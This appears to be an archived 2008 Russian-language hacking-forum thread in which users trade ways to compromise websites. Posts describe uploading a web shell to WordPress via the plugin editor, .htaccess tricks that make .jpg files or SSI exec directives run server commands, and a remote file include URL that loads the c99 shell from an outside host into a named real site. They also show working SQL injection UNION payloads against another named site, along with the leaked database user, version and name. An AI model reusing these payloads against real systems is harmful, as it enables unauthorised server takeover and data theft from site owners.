HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1741  
Старый 22.04.2008, 22:17
Спайдер
Banned
Регистрация: 18.04.2008
Сообщений: 8
Провел на форуме:
65191

Репутация: 48
По умолчанию

на локалхосте
 
Ответить с цитированием

  #1742  
Старый 23.04.2008, 07:46
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ
По умолчанию

Как залить шелл в Wordpress ?!
 
Ответить с цитированием

  #1743  
Старый 23.04.2008, 07:58
Piflit
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756

Репутация: 2032


Отправить сообщение для Piflit с помощью ICQ
По умолчанию

Цитата:
Сообщение от ~!DoK_tOR!~  
Как залить шелл в Wordpress ?!
если есть доступ к админке, то отредактировать нужную страницу. system(); etc
 
Ответить с цитированием

  #1744  
Старый 23.04.2008, 08:14
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ
По умолчанию

есть, пробывал Fetal Error или File edited successfully. и потом выплняю
http://www.site.com/wp-admin/plugin-editor.php?file=get-recent-comments/get-recent-comments.php?cmd=ls пишет Sorry, that file cannot be edited. хотя файл сохранён
 
Ответить с цитированием

  #1745  
Старый 23.04.2008, 09:32
Grema
Участник форума
Регистрация: 29.11.2005
Сообщений: 122
Провел на форуме:
1050637

Репутация: 27
По умолчанию

я как-то заливал так. в .htaccess дописывал
Код:
AddHandler application/x-httpd-php .jpg
ищел в добовление новости, там было загрузить картинку, банально лил шелл с окончание jpg и все)
 
Ответить с цитированием

  #1746  
Старый 23.04.2008, 12:20
nicusor
Участник форума
Регистрация: 19.03.2008
Сообщений: 108
Провел на форуме:
1357043

Репутация: 137
По умолчанию

Цитата:
Сообщение от Ershik  
Точнее можете расписать, что с этим делать? сси использовать как "перл"-файл?
Для начала я засунул скрипты себе на хостинг, вашим скриптом воспользоваться не могу.
я забыл добавить .. так как на моём хосте всё в конфиге апача написано

Надо создать файл .htaccess
с содержанием

Код:
AddType text/html .shtml
AddHandler server-parsed .shtml
Options +Include
дальше можешь запустить скрипт который я написал выше
или же создать файл с расширением .shtml и написать в нём
Код:
<!--#exec cmd="ls -la"-->
где ls -la команда которую ты хочешь выполнить на сервере

и открыть его на сервере. пример www.site.ru/a.shtml
 
Ответить с цитированием

  #1747  
Старый 23.04.2008, 13:27
Art-Ge-Force
Новичок
Регистрация: 19.04.2008
Сообщений: 28
Провел на форуме:
201547

Репутация: 16
Отправить сообщение для Art-Ge-Force с помощью ICQ
По умолчанию

http://www.kat.kg/?file=[url] , что с етого можно поиметь ?
 
Ответить с цитированием

  #1748  
Старый 23.04.2008, 13:35
Fuckel
Участник форума
Регистрация: 17.01.2008
Сообщений: 170
Провел на форуме:
1608606

Репутация: 105
Отправить сообщение для Fuckel с помощью ICQ
По умолчанию

это уязвимость нзвается инклудом ч/з него иногда можно лит web-shell, вот юзай, например, это шелл, http://www.kat.kg/index.php?file=http://madnet.name/files/download/9_c99madshell.php
 
Ответить с цитированием

  #1749  
Старый 23.04.2008, 13:55
nicusor
Участник форума
Регистрация: 19.03.2008
Сообщений: 108
Провел на форуме:
1357043

Репутация: 137
По умолчанию

http://www.moldagrotehnica.md/index.php?newsid=9999999999999+UNION+SELECT+1,2,3, 4,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,database( ),user(),version()),0x71),0x71),6,7/*


что можно ещё нарыть ?
 
Ответить с цитированием

  #1750  
Старый 23.04.2008, 14:19
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

nicusor
Там восемь столбцов
_http://www.moldagrotehnica.md/index.php?newsid=-66+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat (user(),char(58),version(),char(58),database()),0x 71),0x71),4,5,6,7,8/*
agro@localhost:4.1.14:moldagrotehnica_md
Подбирай таблицы если надо

Последний раз редактировалось jokester; 23.04.2008 в 18:08..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ